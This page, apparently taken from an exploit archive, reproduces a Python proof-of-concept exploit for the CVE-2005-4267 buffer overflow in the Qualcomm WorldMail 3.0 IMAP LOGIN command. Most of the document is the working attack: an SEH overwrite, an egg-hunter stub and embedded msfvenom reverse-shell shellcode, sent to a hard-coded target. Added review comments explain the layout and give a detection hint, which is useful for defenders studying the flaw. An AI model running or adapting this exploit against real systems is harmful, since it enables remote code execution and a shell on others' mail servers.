





Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command

CVE Category Price Severity
CVE-2005-4267 CWE-119 Unknown High
Author Risk Exploitation Type Date
Cesar Cerrudo High Remote 2020-06-13
CPE
cpe:cpe:/a:qualcomm:worldmail:3.0.039:imapd
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060053

Below is a copy:

Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
# Exploit Title: Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
# Buffer overflow in Qualcomm WorldMail 3.0 and earlier allows remote attackers to execute arbitrary code via a LOGIN command containing a long run of "}" characters.
# Exploit Author: Sarang Tumne @SarT
# Date: 13th June, 2020
# CVE ID: CVE-2005-4267
# Confirmed on release 3.0
# Vendor: https://www.qualcomm.com/

###############################################

import socket
import time

# NOTE(review): this is a Python 2 script as written -- the `print` statement at the
# end is a SyntaxError on Python 3, and a.send() is handed a str rather than bytes.
# The "\x.." escapes below yield raw 0x00-0xFF bytes only under Python 2's byte-string
# semantics; on Python 3 they would be Unicode code points and re-encoded on send.
a=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

# Target address and port are hard-coded (IMAP, TCP 143). No timeout is set on the
# socket, so connect() and the final recv() block indefinitely against a host that
# never answers or never closes.
a.connect(("192.168.56.112",143))
# The LOGIN argument is assembled piecewise. Offsets are the author's and are not
# verified here; the layout below follows the author's own inline labels.
buffer="A"*687                       # filler
# 32 raw bytes, unlabelled in the listing. They contain "w00t" (\x77\x30\x30\x74)
# twice, matching the "w00tw00t" tag appended further down -- consistent with an
# egg-hunting stub, but the source does not say so.
buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
buffer+="B"*50                       # filler
buffer+="\xEB\xb6\x90\x90"  #nseh    -- author's label: overwrites the next-SEH pointer
buffer+="\xe7\xb2\x0d\x60"  #PPR     -- author's label: SEH handler address (PPR is conventionally pop/pop/ret)
#buffer+="\x90"*30
buffer+="w00tw00t"                   # tag that the 32-byte stub above appears to search for
buffer+="\x90"*40                    # NOP sled preceding the payload
# Payload bytes; per the author's comment they were generated with msfvenom
# (windows/shell_reverse_tcp, alpha_mixed encoder, bad chars \x00\x0a\x0d).
# The LHOST/LPORT baked into these bytes cannot be read from the source.
buffer+=("\x89\xe1\xdb\xc2\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" #msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f c -b "\x00\x0a\x0d" EXITFUNC=seh -e x86/alpha_mixed
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x48\x68\x6c\x42\x35\x50\x65\x50\x53\x30\x75\x30\x4c"
"\x49\x6a\x45\x46\x51\x39\x50\x55\x34\x6e\x6b\x56\x30\x50\x30"
"\x4c\x4b\x50\x52\x66\x6c\x4e\x6b\x32\x72\x76\x74\x4c\x4b\x31"
"\x62\x67\x58\x64\x4f\x78\x37\x42\x6a\x51\x36\x75\x61\x59\x6f"
"\x6e\x4c\x45\x6c\x65\x31\x53\x4c\x54\x42\x54\x6c\x37\x50\x4f"
"\x31\x48\x4f\x34\x4d\x55\x51\x39\x57\x38\x62\x4a\x52\x53\x62"
"\x53\x67\x6c\x4b\x56\x32\x72\x30\x4c\x4b\x31\x5a\x77\x4c\x4e"
"\x6b\x30\x4c\x67\x61\x34\x38\x4d\x33\x47\x38\x37\x71\x6e\x31"
"\x33\x61\x6c\x4b\x73\x69\x61\x30\x56\x61\x69\x43\x4e\x6b\x47"
"\x39\x44\x58\x49\x73\x77\x4a\x50\x49\x6c\x4b\x64\x74\x4c\x4b"
"\x77\x71\x39\x46\x75\x61\x69\x6f\x6c\x6c\x7a\x61\x68\x4f\x54"
"\x4d\x55\x51\x78\x47\x37\x48\x39\x70\x71\x65\x4c\x36\x75\x53"
"\x73\x4d\x78\x78\x47\x4b\x33\x4d\x44\x64\x61\x65\x58\x64\x51"
"\x48\x4e\x6b\x70\x58\x74\x64\x55\x51\x79\x43\x70\x66\x6c\x4b"
"\x64\x4c\x52\x6b\x4c\x4b\x30\x58\x77\x6c\x55\x51\x6b\x63\x6c"
"\x4b\x36\x64\x6e\x6b\x36\x61\x68\x50\x4f\x79\x63\x74\x67\x54"
"\x61\x34\x51\x4b\x61\x4b\x50\x61\x70\x59\x63\x6a\x36\x31\x79"
"\x6f\x59\x70\x63\x6f\x63\x6f\x52\x7a\x6e\x6b\x72\x32\x6a\x4b"
"\x6c\x4d\x63\x6d\x43\x58\x74\x73\x47\x42\x67\x70\x37\x70\x72"
"\x48\x44\x37\x30\x73\x76\x52\x61\x4f\x33\x64\x55\x38\x42\x6c"
"\x53\x47\x56\x46\x37\x77\x4b\x4f\x5a\x75\x68\x38\x6c\x50\x46"
"\x61\x35\x50\x57\x70\x56\x49\x39\x54\x32\x74\x46\x30\x43\x58"
"\x46\x49\x4f\x70\x32\x4b\x47\x70\x49\x6f\x69\x45\x62\x70\x32"
"\x70\x70\x50\x72\x70\x71\x50\x62\x70\x67\x30\x42\x70\x51\x78"
"\x5a\x4a\x74\x4f\x39\x4f\x6d\x30\x59\x6f\x69\x45\x4a\x37\x53"
"\x5a\x44\x45\x33\x58\x49\x50\x6c\x68\x55\x68\x50\x6c\x52\x48"
"\x34\x42\x45\x50\x62\x31\x71\x4c\x6c\x49\x48\x66\x43\x5a\x74"
"\x50\x61\x46\x52\x77\x61\x78\x6c\x59\x4c\x65\x33\x44\x51\x71"
"\x49\x6f\x48\x55\x4e\x65\x49\x50\x71\x64\x76\x6c\x4b\x4f\x32"
"\x6e\x45\x58\x54\x35\x78\x6c\x70\x68\x6c\x30\x38\x35\x59\x32"
"\x61\x46\x6b\x4f\x79\x45\x72\x48\x52\x43\x42\x4d\x32\x44\x55"
"\x50\x6d\x59\x6a\x43\x42\x77\x32\x77\x32\x77\x75\x61\x48\x76"
"\x42\x4a\x72\x32\x42\x79\x73\x66\x68\x62\x49\x6d\x35\x36\x4a"
"\x67\x31\x54\x77\x54\x75\x6c\x46\x61\x37\x71\x4c\x4d\x53\x74"
"\x47\x54\x56\x70\x38\x46\x35\x50\x57\x34\x63\x64\x56\x30\x51"
"\x46\x53\x66\x42\x76\x77\x36\x36\x36\x30\x4e\x46\x36\x51\x46"
"\x51\x43\x51\x46\x45\x38\x62\x59\x78\x4c\x75\x6f\x4e\x66\x79"
"\x6f\x4b\x65\x4c\x49\x49\x70\x30\x4e\x76\x36\x62\x66\x6b\x4f"
"\x74\x70\x42\x48\x63\x38\x4e\x67\x47\x6d\x63\x50\x79\x6f\x4e"
"\x35\x6f\x4b\x49\x6e\x56\x6e\x54\x72\x48\x6a\x72\x48\x49\x36"
"\x6e\x75\x4d\x6d\x4d\x4d\x39\x6f\x4e\x35\x75\x6c\x63\x36\x63"
"\x4c\x46\x6a\x6b\x30\x59\x6b\x69\x70\x43\x45\x36\x65\x4d\x6b"
"\x51\x57\x52\x33\x64\x32\x72\x4f\x70\x6a\x45\x50\x33\x63\x39"
"\x6f\x4a\x75\x41\x41")
#buffer+="\x90"*40

# 300 "}" characters appended after the payload. The header comment at the top of the
# file attributes the overflow to this run of "}" characters in LOGIN.
# Detection note: on the wire this is a single IMAP LOGIN whose argument is well over
# a kilobyte and ends in hundreds of "}" bytes -- an easy shape to alert on.
junk=("}")*300
#buffer+="B"*4
#buffer+="C"*500
# Tag "A001" plus the LOGIN verb, then the assembled argument and CRLF. One send()
# call; its return value (bytes actually written) is not checked.
a.send("A001 LOGIN "+buffer+junk+"\r\n")

# Reads up to 50000 bytes of whatever the server returns and prints it (Python 2
# print statement). Blocks if the service neither replies nor closes the connection.
print a.recv(50000)
a.close()
